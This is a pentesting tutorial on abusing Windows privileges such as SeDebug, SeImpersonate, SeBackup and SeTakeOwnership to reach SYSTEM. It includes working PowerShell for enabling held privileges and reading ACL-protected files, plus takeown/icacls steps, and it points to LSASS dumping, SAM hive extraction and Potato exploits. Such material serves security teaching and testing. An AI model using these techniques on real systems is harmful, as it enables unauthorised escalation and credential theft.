Windows Privileges:
Understanding Windows privileges is crucial when targeting local escalation, persistence, and impersonation on Windows systems. This guide breaks down the core privileges in Windows, how they affect security, and how pentesters can abuse them to move from user to SYSTEM — or better.
What Are Windows Privileges?
Privileges are specific rights assigned to users or groups that allow them to perform system-level actions.
- Unlike permissions (which are object-specific), privileges apply to the system as a whole.
- They're assigned through User Rights Assignment (Local Security Policy or Group Policy) and show up in the access token of every logon session for that user or group.
- To view your current privileges:
whoami /priv
Each privilege has a name (e.g., SeDebugPrivilege) and a state:
- Enabled: the privilege is present in the token and active.
- Disabled: the privilege is present in the token but switched off; any process running under that token can turn it on itself with AdjustTokenPrivileges, so a Disabled entry is still usable.
- Removed: the privilege has been stripped from the token (SE_PRIVILEGE_REMOVED) and cannot be re-enabled. whoami /priv only lists Enabled and Disabled entries, so a removed privilege simply does not appear.
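To turn that output into a quick triage list, here is an added PowerShell example (not part of the original guide) that parses whoami /priv and flags the privileges this guide covers. The sample output embedded below is constructed for illustration; on a live host the function runs whoami itself when no input is given.

```powershell
# Added example: triage 'whoami /priv' output against the privileges this guide covers.
$DangerousPrivs = @{
    'SeDebugPrivilege'              = 'LSASS dump, token theft'
    'SeImpersonatePrivilege'        = 'PrintSpoofer / Potato to SYSTEM'
    'SeAssignPrimaryTokenPrivilege' = 'spawn a process with a stolen token'
    'SeTcbPrivilege'                = 'act as part of the OS'
    'SeBackupPrivilege'             = 'read SAM/SYSTEM hives and ACL-protected files'
    'SeRestorePrivilege'            = 'overwrite protected files and hives'
    'SeTakeOwnershipPrivilege'      = 'take ownership, then rewrite DACLs'
    'SeLoadDriverPrivilege'         = 'load a kernel driver'
    'SeCreateTokenPrivilege'        = 'craft arbitrary tokens'
    'SeManageVolumePrivilege'       = 'volume maintenance / raw volume access'
}

function Get-DangerousPrivilege {
    param(
        # Lines of 'whoami /priv' output. Defaults to running whoami on this host.
        [string[]]$WhoamiOutput = (whoami.exe /priv)
    )
    foreach ($line in $WhoamiOutput) {
        # Rows are space-padded columns: name, description, then Enabled/Disabled last.
        if ($line -match '^(?<name>Se\w+Privilege)\s+(?<desc>.+?)\s+(?<state>Enabled|Disabled)\s*$') {
            $name  = $Matches.name
            $state = $Matches.state
            if ($DangerousPrivs.ContainsKey($name)) {
                # Disabled only means switched off, not absent: the process can re-enable
                # it with AdjustTokenPrivileges, so it still counts as a finding.
                $note = if ($state -eq 'Disabled') { 'held; enable before use' } else { 'ready' }
                [pscustomobject]@{
                    Privilege = $name
                    State     = $state
                    Abuse     = $DangerousPrivs[$name]
                    Note      = $note
                }
            }
        }
    }
}

# Constructed sample output (shaped like an IIS application-pool token), for offline use:
$Sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
'@ -split "`r?`n"

Get-DangerousPrivilege -WhoamiOutput $Sample | Format-Table -AutoSize
# Live host: Get-DangerousPrivilege | Format-Table -AutoSize
```

On the constructed sample this reports SeAssignPrimaryTokenPrivilege (held, Disabled) and SeImpersonatePrivilege (Enabled), which is exactly the Potato situation described further down.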
Most Critical Privileges for Pentesters
1. SeDebugPrivilege
- Allows: Opening any process or thread with full access regardless of its DACL, including SYSTEM processes (protected processes, such as LSASS with RunAsPPL, remain off limits)
- Abuse: Dump LSASS, steal and duplicate tokens, inject into processes
- Tools: Mimikatz, Process Hacker, PowerShell
- Enable: Administrators hold it Disabled by default; mimikatz switches it on with
privilege::debug
- Privilege Escalation: Token theft, LSASS dumping
2. SeImpersonatePrivilege
- Allows: Impersonating a client's token after that client authenticates to your process (for example over a named pipe or RPC)
- Abuse: Token impersonation; coerce a SYSTEM service into connecting to you and impersonate it with PrintSpoofer or the Potato family
- Key in: Service-account contexts (IIS application pools, MSSQL, LOCAL SERVICE/NETWORK SERVICE) and local privilege escalation from them
- Check:
whoami /priv should list it as Enabled
3. SeAssignPrimaryTokenPrivilege
- Allows: Assigning a primary token to a new process (CreateProcessAsUser)
- Abuse: Spawn a SYSTEM process from a stolen token; the Potato tools use it as an alternative to SeImpersonatePrivilege, and either privilege on its own is enough for a SYSTEM shell
- Used in: Custom payloads, scripting abuse
4. SeTcbPrivilege (Act as part of the operating system)
- Very powerful: lets the holder create logon sessions and tokens with arbitrary SIDs through LsaLogonUser
- Rarely assigned; normally only SYSTEM and a handful of services hold it
- Used for: Trusted logon sessions; dangerous if misconfigured
5. SeBackupPrivilege
- Allows: Reading any file or registry key regardless of its ACL, provided the handle is opened with backup semantics (FILE_FLAG_BACKUP_SEMANTICS or REG_OPTION_BACKUP_RESTORE); a plain copy or Get-Content still fails with access denied
- Abuse: Copy the SAM, SYSTEM and SECURITY hives, NTDS.dit from a shadow copy, and other protected files
- Tools:
reg save, robocopy /B, vssadmin or diskshadow, PowerShell
6. SeRestorePrivilege
- Allows: Writing to any file or registry key regardless of its ACL (again through backup/restore semantics), and setting arbitrary owners
- Abuse: Overwrite protected files such as service binaries, modify registry hives, plant DLLs in system directories
- Combined with: SeBackupPrivilege for full read/write control over the filesystem
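Two points above trip people up in practice: a Disabled privilege can be switched on by the process that holds it, and SeBackupPrivilege only bypasses the ACL when the file is opened with backup semantics. The following PowerShell example is added here (it is not the guide's code) to demonstrate both for the SeDebugPrivilege and SeBackupPrivilege sections: it wraps AdjustTokenPrivileges and CreateFile through Add-Type, enables a named privilege in the current process, and copies an ACL-protected file. The file paths in the usage lines are hypothetical.

```powershell
# Added example: enable a privilege the token already holds, then read an
# ACL-protected file with FILE_FLAG_BACKUP_SEMANTICS. Windows only (P/Invoke).
$Win32Source = @'
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;

public static class Win32Priv
{
    [StructLayout(LayoutKind.Sequential)]
    public struct LUID { public uint LowPart; public int HighPart; }

    // TOKEN_PRIVILEGES holding exactly one LUID_AND_ATTRIBUTES entry.
    [StructLayout(LayoutKind.Sequential)]
    public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }

    public const uint TOKEN_ADJUST_PRIVILEGES    = 0x0020;
    public const uint TOKEN_QUERY                = 0x0008;
    public const uint SE_PRIVILEGE_ENABLED       = 0x0002;
    public const int  ERROR_NOT_ALL_ASSIGNED     = 1300;
    public const uint GENERIC_READ               = 0x80000000;
    public const uint FILE_SHARE_READ            = 0x0001;
    public const uint OPEN_EXISTING              = 3;
    public const uint FILE_FLAG_BACKUP_SEMANTICS = 0x02000000;

    [DllImport("kernel32.dll")]
    public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern SafeFileHandle CreateFile(string path, uint access, uint share,
        IntPtr sa, uint disposition, uint flags, IntPtr template);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll,
        ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);

    // True if the privilege is now enabled, false if the token does not hold it at all.
    public static bool EnablePrivilege(string name)
    {
        IntPtr token;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out token))
            throw new Exception("OpenProcessToken failed: " + Marshal.GetLastWin32Error());
        try
        {
            TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
            tp.PrivilegeCount = 1;
            tp.Attributes = SE_PRIVILEGE_ENABLED;
            if (!LookupPrivilegeValue(null, name, out tp.Luid))
                throw new Exception("LookupPrivilegeValue failed: " + Marshal.GetLastWin32Error());
            if (!AdjustTokenPrivileges(token, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero))
                throw new Exception("AdjustTokenPrivileges failed: " + Marshal.GetLastWin32Error());
            // Pitfall: the call returns TRUE even when the token lacks the privilege;
            // the only signal is ERROR_NOT_ALL_ASSIGNED in the last-error value.
            return Marshal.GetLastWin32Error() != ERROR_NOT_ALL_ASSIGNED;
        }
        finally { CloseHandle(token); }
    }
}
'@
Add-Type -TypeDefinition $Win32Source

function Enable-Privilege {
    param([Parameter(Mandatory)][string]$Name)
    if (-not [Win32Priv]::EnablePrivilege($Name)) {
        throw "$Name is not held by this token, so it cannot be enabled"
    }
    "$Name enabled"
}

function Copy-FileWithBackupSemantics {
    param([Parameter(Mandatory)][string]$Source,
          [Parameter(Mandatory)][string]$Destination)
    $null = Enable-Privilege 'SeBackupPrivilege'
    # With SeBackupPrivilege enabled and FILE_FLAG_BACKUP_SEMANTICS set, the kernel
    # skips the DACL check on the open. Without the flag the open fails as usual.
    $handle = [Win32Priv]::CreateFile($Source, [Win32Priv]::GENERIC_READ,
        [Win32Priv]::FILE_SHARE_READ, [IntPtr]::Zero, [Win32Priv]::OPEN_EXISTING,
        [Win32Priv]::FILE_FLAG_BACKUP_SEMANTICS, [IntPtr]::Zero)
    if ($handle.IsInvalid) {
        throw "CreateFile failed: $([System.Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    $src = New-Object System.IO.FileStream($handle, [System.IO.FileAccess]::Read)
    $dst = [System.IO.File]::Create($Destination)
    try { $src.CopyTo($dst) } finally { $dst.Dispose(); $src.Dispose() }
    Get-Item -LiteralPath $Destination
}

# Usage (paths are hypothetical):
Enable-Privilege 'SeDebugPrivilege'        # Administrators hold it Disabled by default
whoami /priv | Select-String 'SeDebugPrivilege|SeBackupPrivilege'
Copy-FileWithBackupSemantics -Source 'C:\Users\Administrator\Desktop\notes.txt' `
                             -Destination "$env:TEMP\notes.txt"
```

Backup semantics bypass the DACL, not sharing violations: the live SAM and SYSTEM hives are held open exclusively by the kernel, so for those use reg save (which applies backup semantics itself) or copy them out of a shadow copy. Enabling a privilege this way changes only the current process token; child processes started afterwards inherit the enabled state, which is why whoami /priv in the usage line reflects it.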
7. SeTakeOwnershipPrivilege
- Allows: Taking ownership of any securable object (files, directories, registry keys, services)
- Abuse: Take ownership of critical files or registry keys, then rewrite their DACL; ownership by itself grants no read or write access, only the implicit right to change permissions, so follow up with icacls
- Command:
takeown /F C:\targetfile
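Ownership alone is not access, which is the step the command above leaves out. This added PowerShell example (not from the guide) runs the full sequence: takeown, then icacls to grant the current user full control, then Get-Acl to verify what was actually obtained. The target path is hypothetical.

```powershell
# Added example: take ownership of a file, rewrite its DACL, verify the result.
function Take-FileControl {
    param([Parameter(Mandatory)][string]$Path)
    $me = "$env:USERDOMAIN\$env:USERNAME"

    # Step 1: take ownership. takeown enables SeTakeOwnershipPrivilege in its own
    # token, so it works for any holder of the privilege, not only administrators.
    takeown.exe /F $Path | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "takeown failed on $Path (exit $LASTEXITCODE)" }

    # Step 2: ownership grants no read/write by itself, only the implicit right to
    # rewrite the DACL (WRITE_DAC). Grant full control to the current user.
    icacls.exe $Path /grant "$($me):F" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "icacls failed on $Path (exit $LASTEXITCODE)" }

    # Step 3: verify the owner and the rights the current user now holds.
    $acl = Get-Acl -LiteralPath $Path
    [pscustomobject]@{
        Path   = $Path
        Owner  = $acl.Owner
        Rights = ($acl.Access |
            Where-Object { $_.IdentityReference.Value -eq $me } |
            ForEach-Object { $_.FileSystemRights.ToString() }) -join ', '
    }
}

# Hypothetical target: a service binary whose DACL denies the current user.
Take-FileControl -Path 'C:\Program Files\ExampleSvc\ExampleSvc.exe'
```

For registry keys the same three steps apply with Get-Acl/Set-Acl on the HKLM: drive, but there the PowerShell process itself must have SeTakeOwnershipPrivilege enabled before SetOwner will succeed, since no helper executable enables it for you.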
8. SeLoadDriverPrivilege
- Allows: Loading and unloading kernel drivers (NtLoadDriver); driver signature enforcement still applies on 64-bit Windows, so the usual abuse is loading a signed but vulnerable driver and using it for kernel read/write
- Abuse: Install kernel-mode backdoors or rootkits, tamper with EDR callbacks
- Warning: Mistakes at ring 0 crash the machine (blue screen)
9. SeCreateTokenPrivilege
- Allows: Creating tokens from scratch with NtCreateToken, with any SIDs, groups and privileges you choose
- Very rare (normally only LSASS holds it), but extremely dangerous
- Used in: Custom token crafting (advanced persistence)
10. SeManageVolumePrivilege (Perform volume maintenance tasks)
- Allows: Volume maintenance such as defragmentation, opening volume handles, and SetFileValidData, which extends a file without zeroing the sectors it grows into
- Abuse: Read leftover disk contents and work below the filesystem's ACLs
- Used in: Forensic evasion, data hiding
Privilege Summary Table
| Privilege | Abuse Potential | Typical Use/Tool |
|---|---|---|
| SeDebugPrivilege | Token theft, LSASS dump | Mimikatz, Process Explorer |
| SeImpersonatePrivilege | SYSTEM shell, Potato chain | PrintSpoofer, JuicyPotato |
| SeAssignPrimaryTokenPrivilege | Spawn a process with a stolen token | Custom scripts, API abuse |
| SeTcbPrivilege | Full OS control | Rarely exploitable, but deadly |
| SeBackupPrivilege | Read everything | reg save, robocopy /B, vssadmin, PowerShell |
| SeRestorePrivilege | Overwrite protected files | reg restore, backdoor implantation |
| SeTakeOwnershipPrivilege | Take file control | takeown, icacls |
| SeLoadDriverPrivilege | Kernel-level backdoors | Manual driver loading |
| SeCreateTokenPrivilege | Craft any token | Manual or advanced attack tools |
| SeManageVolumePrivilege | Raw volume access | Disk sector read/write, stealth ops |
Tools to Enumerate and Abuse Privileges
Enumeration
- whoami /priv
- Get-TokenPrivs.ps1 (PowerView)
- Seatbelt.exe (Seatbelt -group=all)
- accesschk.exe -p user
Abuse & Exploitation
- mimikatz privilege::debug
- PrintSpoofer.exe
- JuicyPotato.exe, RoguePotato.exe, SweetPotato.exe
- Custom PowerShell/C# scripts
Common Escalation Paths via Privileges
SeImpersonate + SeAssignPrimaryToken
- Classic Potato exploit chain → SYSTEM (either privilege alone is enough; the tools use CreateProcessWithTokenW or CreateProcessAsUser accordingly)
SeDebugPrivilege
- Open a SYSTEM process → Dump creds or duplicate its token
SeBackup + SeRestore
- Extract the SAM and SYSTEM hives → Crack or pass the hashes offline
SeTakeOwnership
- Modify registry keys or service binary ACLs
SeCreateToken
- Craft a token → Spawn SYSTEM shell (very rare, but powerful)
Pentesting Tips
- Always check your current privileges with whoami /priv
- Look for service accounts with high privileges
- Use accesschk.exe to find weak file and service permissions
- Combine privileges with token abuse or service misconfigurations
- Build persistence by escalating and then granting yourself the privileges you need
Final Thoughts
Privileges are quiet but deadly. Most users never notice them — but if you do, and you know how to abuse them, they become one of your sharpest weapons on Windows.
Whether you’re targeting local escalation, persistence, or impersonation, map out your privileges early and plan your attacks accordingly. Like tokens, they’re part of the Windows soul — and they’re yours to master.
